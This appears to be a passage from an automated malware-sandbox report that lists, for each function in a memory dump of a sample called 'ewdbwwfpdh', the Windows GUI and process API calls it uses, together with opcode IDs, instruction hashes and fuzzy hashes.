                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long
                                                                                                    • String ID:
                                                                                                    • API String ID: 847901565-0
                                                                                                    • Opcode ID: bff56e8e7f6e661a5c49ae208435173cb1f6c475b7e77dfdce8907e6b4826f2a
                                                                                                    • Instruction ID: ad52256694e5fb55075d0e27812f0c34d11845f27f3701735fc593cb573a2c4b
                                                                                                    • Opcode Fuzzy Hash: bff56e8e7f6e661a5c49ae208435173cb1f6c475b7e77dfdce8907e6b4826f2a
                                                                                                    • Instruction Fuzzy Hash: 9811A231921325AFCB118F69EC08A6B3BA9AB45370F224724F979D72F1DB319921CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 47f4ca072741a5af61157618e07048d1f398a35dd89077178b2e4667dc7fdbb5
                                                                                                    • Instruction ID: 13b393c401705f368967bceff3831a36936a20648386d2445fca85c0a77cb10a
                                                                                                    • Opcode Fuzzy Hash: 47f4ca072741a5af61157618e07048d1f398a35dd89077178b2e4667dc7fdbb5
                                                                                                    • Instruction Fuzzy Hash: 68018FBA6096157EE72126BC7CC5F27665DDF533B8B310325F621A11D2DB748C414560
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 001D22D7
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D22E9
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D22FF
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D231A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 3f506b9733790e5985326a1af75c2ea0c8a86eb892f9a27eef3b49661ac46cf4
                                                                                                    • Instruction ID: 1c6a6e19c747f4ac4421d166a667d3361eff4b95b7fdd0b58aeb68da6d7cef32
                                                                                                    • Opcode Fuzzy Hash: 3f506b9733790e5985326a1af75c2ea0c8a86eb892f9a27eef3b49661ac46cf4
                                                                                                    • Instruction Fuzzy Hash: AE11F73A901228FFEB119BA5C985F9DBBB8FB18750F210092EA10B7290D7716E10DB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 00172441: GetWindowLongW.USER32(00000000,000000EB), ref: 00172452
                                                                                                    • GetClientRect.USER32(?,?), ref: 0020A890
                                                                                                    • GetCursorPos.USER32(?), ref: 0020A89A
                                                                                                    • ScreenToClient.USER32(?,?), ref: 0020A8A5
                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 0020A8D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4127811313-0
                                                                                                    • Opcode ID: c2a4ee59ba002e97767c2751912efa1f370966ab25832283be8d11b1dd3aad47
                                                                                                    • Instruction ID: 61eaa0fc485789a0548f30423c1d2ed845fde34772ecb42fadbe9fe10a9683fc
                                                                                                    • Opcode Fuzzy Hash: c2a4ee59ba002e97767c2751912efa1f370966ab25832283be8d11b1dd3aad47
                                                                                                    • Instruction Fuzzy Hash: B4110A7191121AEFDF14DF94E8499EE77B8EB05300F508455F912E3192D730BAA2CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001DEA29
                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 001DEA5C
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001DEA72
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001DEA79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2880819207-0
                                                                                                    • Opcode ID: 3fb91d18d70586cde2b26125980e1ec0a98fe21a46c626045288279107807e4f
                                                                                                    • Instruction ID: 26d00644eecde96fe714831d866c019661f5d2aad437681318569d9ae3b637e2
                                                                                                    • Opcode Fuzzy Hash: 3fb91d18d70586cde2b26125980e1ec0a98fe21a46c626045288279107807e4f
                                                                                                    • Instruction Fuzzy Hash: 2411087A900259BBCB01AFA8AC09A9B7FBDAB46311F004256F825E7391D7748D0487A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00208792
                                                                                                    • ScreenToClient.USER32(?,?), ref: 002087AA
                                                                                                    • ScreenToClient.USER32(?,?), ref: 002087CE
                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002087E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 357397906-0
                                                                                                    • Opcode ID: 36148cf45aff2e18cca8dffca9336fe9a152f422cc1c8dd77a50a51e755dc7c2
                                                                                                    • Instruction ID: 4cf2bba9c4c1e11474186c2f0a8c4d66377df0075ea80e17b3c4e5b9c58266fd
                                                                                                    • Opcode Fuzzy Hash: 36148cf45aff2e18cca8dffca9336fe9a152f422cc1c8dd77a50a51e755dc7c2
                                                                                                    • Instruction Fuzzy Hash: 041144B9D0120AEFDB41CF98D8849EEBBF9FB08310F104166E915E3211D735AA54CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000008), ref: 0017216C
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00172176
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00172189
                                                                                                    • GetStockObject.GDI32(00000005), ref: 00172191
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                    • String ID:
                                                                                                    • API String ID: 4037423528-0
                                                                                                    • Opcode ID: 77c192a1ce4addfeae1759ccfe7ac2ed904f93fee2cd8880cc8bf1c27709c015
                                                                                                    • Instruction ID: 696c39e34ce6f37372a86fc6534bed421977de435e85f78980b2a5508319a5af
                                                                                                    • Opcode Fuzzy Hash: 77c192a1ce4addfeae1759ccfe7ac2ed904f93fee2cd8880cc8bf1c27709c015
                                                                                                    • Instruction Fuzzy Hash: 61E06D31281740AEDB215BB4BC0DBE8BB60AB12336F04C219F6BE880E2C77246519B10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 001CEBD6
                                                                                                    • GetDC.USER32(00000000), ref: 001CEBE0
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001CEC00
                                                                                                    • ReleaseDC.USER32(?), ref: 001CEC21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: 6af71a6eb53714bae9577f4df527294dded3c59e22f834fcb24672fa49808ed0
                                                                                                    • Instruction ID: add8bf2a3ec438f2f51dde7cfd56d6ab97720ba38e2333ec88ac1f1cd5ecf6dd
                                                                                                    • Opcode Fuzzy Hash: 6af71a6eb53714bae9577f4df527294dded3c59e22f834fcb24672fa49808ed0
                                                                                                    • Instruction Fuzzy Hash: 9DE01AB4801301DFCB50AFA0A80CB6DBBF5FB08310F11C449E81AE3211CB3A99419F00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 001CEBEA
                                                                                                    • GetDC.USER32(00000000), ref: 001CEBF4
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001CEC00
                                                                                                    • ReleaseDC.USER32(?), ref: 001CEC21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: 315925836105eed1ca06497967adef9effe336047438aafe8baf0074222529b7
                                                                                                    • Instruction ID: 1702efed3f55174de5e53612be78e6314000490e6daa1f11aa1538bb28758b3c
                                                                                                    • Opcode Fuzzy Hash: 315925836105eed1ca06497967adef9effe336047438aafe8baf0074222529b7
                                                                                                    • Instruction Fuzzy Hash: 44E092B5901305EFCB51AFA0A84CA6DBBF9BB48311F158449E95EE3251DB3A9A019F10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
• __startOneArgErrorHandling.LIBCMT ref: 0019E69D
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: 4efb117856f7dd8909407a748f80572d6259840be5d45b8526f06aee72b3dd77
• Instruction ID: d31201582e566e4177b347f5677c5c40c8b9029c7501360c95b1c12e44fec95a
• Opcode Fuzzy Hash: 4efb117856f7dd8909407a748f80572d6259840be5d45b8526f06aee72b3dd77
• Instruction Fuzzy Hash: 94516965E082019ACF15F714DD053BA3BE4AB72B40F308969F095822E9EF358CD6DA86
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
• Opcode ID: 822c997bc203548cfcc985c6ddb28740a08466df00dd4af863d68fd189b788c3
• Instruction ID: 75c56b165b06234826e20f179ed2723692d268eb422c01ccc468285bb6e5e600
• Opcode Fuzzy Hash: 822c997bc203548cfcc985c6ddb28740a08466df00dd4af863d68fd189b788c3
• Instruction Fuzzy Hash: 69514430908246DFDF18EF68D080BBA7BA1EF25314F65405AE8919B2D0DB30DE42CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY
• API String ID: 157775604-1150593374
• Opcode ID: d985d150987a4f2cf6e6208556901533cd80a7ac3ed3616f14faa9dc1f69870d
• Instruction ID: ab813791fdf921bb06e924c18fe81633b00b5aab90c627134ca0bee7311c5f82
• Opcode Fuzzy Hash: d985d150987a4f2cf6e6208556901533cd80a7ac3ed3616f14faa9dc1f69870d
• Instruction Fuzzy Hash: E841A471A042199FCB14EFA8C8958FEBBF5FFA9320F144069E506A7352EB709D81CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0017771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00177759
  • Part of subcall function 0017771B: GetStockObject.GDI32(00000011), ref: 0017776D
  • Part of subcall function 0017771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00177777
• GetWindowRect.USER32(00000000,?), ref: 002040D9
• GetSysColor.USER32(00000012), ref: 002040F3
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 94b8336065e36ae9440ac2676be813349940b3188131c811974f1d9e47adc625
• Instruction ID: 41ca02075c78654ff1d32239a9bc3d728e39d43342ee68555d85bb4d4d1addc1
• Opcode Fuzzy Hash: 94b8336065e36ae9440ac2676be813349940b3188131c811974f1d9e47adc625
• Instruction Fuzzy Hash: 06113A7262020AAFDB00DFA8DC45AFA7BB9FB09314F004915FE59E3191E775E861DB60
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
  • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001D25DC
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 8344ea27e5a1af4c27a199a8615ad7a211cbf3d76a1ed2b93ff023b7db030711
• Instruction ID: ad28a1706e778f4e93e599d502c527d8933941b58d26ccad5cc95aa5f7072ffd
• Opcode Fuzzy Hash: 8344ea27e5a1af4c27a199a8615ad7a211cbf3d76a1ed2b93ff023b7db030711
• Instruction Fuzzy Hash: F4012871605215ABCB14EBA4DC55DFE7779BF72320B04460AF872933D3EB3098088750
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
  • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
• SendMessageW.USER32(?,00000180,00000000,?), ref: 001D24D6
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 27e705100c8879805857d1c453a665c295b15e5f68a26c4eabe9706217bf9874
• Instruction ID: 29333a5b415bafbca7c86c565733e37ed55e68f3a46b34463dda505419a7c702
• Opcode Fuzzy Hash: 27e705100c8879805857d1c453a665c295b15e5f68a26c4eabe9706217bf9874
• Instruction Fuzzy Hash: 3901F771A05109ABCB28EBA0C855FFF77B89F71304F14001AA81263383DB209E08C671
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
  • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
• SendMessageW.USER32(?,00000182,?,00000000), ref: 001D2558
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: f2c78b48f6cf24975a71eeb05e95cfeabda6ad0ae0a1858766e40b74afe142a1
• Instruction ID: 3e043640f34bdf4ad6d51d47562e4d29ab7ff8ecd7b64194f3f44b3b1c130661
• Opcode Fuzzy Hash: f2c78b48f6cf24975a71eeb05e95cfeabda6ad0ae0a1858766e40b74afe142a1
• Instruction Fuzzy Hash: 2D01A271A45109A7CB24EBA4E956FFEB7B89F32740F144016B812B3382EB349E09C671
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
  • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
• SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 001D2663
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 451a3727b55ad8a28a7ba1ae1098877390d0a232b4e290e898ebc8975e798c59
• Instruction ID: 9eaf4d67dceb042c231dbc716803149ff06755b463a7560a04e73288ca12a446
• Opcode Fuzzy Hash: 451a3727b55ad8a28a7ba1ae1098877390d0a232b4e290e898ebc8975e798c59
• Instruction Fuzzy Hash: BCF0A471A45219A7CB24E7A4DC96FFFB778AF21714F140916F872A33D3DB70A8098660
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00244018,0024405C), ref: 00208B1E
• CloseHandle.KERNEL32 ref: 00208B30
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Similarity
• API ID: CloseCreateHandleProcess
• String ID: \@$
• API String ID: 3712363035-1453171986
• Opcode ID: d995ffc4547f23ac5369128e01dc19bee914c08b91aa58ac0a56542c9fd36f67
• Instruction ID: 8ce75f9142ced504910dd3335fac97999f223b8be60126a0f61832ac98ee0efb
• Instruction Fuzzy Hash: 1EF05EB6551304BBE7247BA0BC49FB73A9CDB16754F001020FB08D6192D6764C6096B8
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
• Opcode ID: 698d62deb08e4d421115c15ce99af133a9d6d72a688bf229d8dfd5ffb96411a5
• Instruction ID: 82489295d1c676d57f59c6c818e1299da6907c18da53d64d4e64e91c29decec8
• Instruction Fuzzy Hash: F5D012A5C14118D9CB94AAD09848DBD73FCA72C300F21445AF806D1001E734D658AB21
Uniqueness
• Uniqueness Score: -1.00%

